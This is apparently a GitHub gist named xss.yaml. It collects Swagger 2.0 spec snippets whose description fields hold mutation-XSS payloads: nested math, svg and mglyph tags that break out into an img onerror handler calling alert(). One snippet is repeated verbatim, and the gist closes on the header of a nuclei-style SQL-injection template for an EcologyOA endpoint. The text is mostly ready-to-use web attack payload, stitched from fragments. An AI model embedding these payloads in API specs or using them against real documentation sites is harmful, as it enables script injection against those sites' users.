Skip to content

Instantly share code, notes, and snippets.

@ifconfig-me
ifconfig-me / xss.yaml
Last active September 23, 2022 21:40
swagger: '2.0'
info:
title: Example yaml.spec
description: |
<math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(window.origin)'>">
paths:
/accounts:
get:
responses:
'200':
swagger: '2.0'
info:
title: Classic API Resource Documentation
description: |
<form><math><mtext></form><form><mglyph><svg><mtext><document.domain><path id="</document.domain><img onerror=alert('document.domain') src=1>"></form>
version: production
basePath: /JSSResource/
produces:
- application/xml
swagger: '2.0'
info:
title: Classic API Resource Documentation
description: |
<form><math><mtext></form><form><mglyph><svg><mtext><document.domain><path id="</document.domain><img onerror=alert('document.domain') src=1>"></form>
version: production
basePath: /JSSResource/
produces:
- application/xml
id: ecology-oa-filedownloadforoutdoc-sqli
info:
name: EcologyOA filedownloadforoutdoc - SQL injection
author: unknown
severity: critical
description: EcologyOA filedownloadforoutdoc interface has SQL injection
tags: ecology-oa,sqli
requests: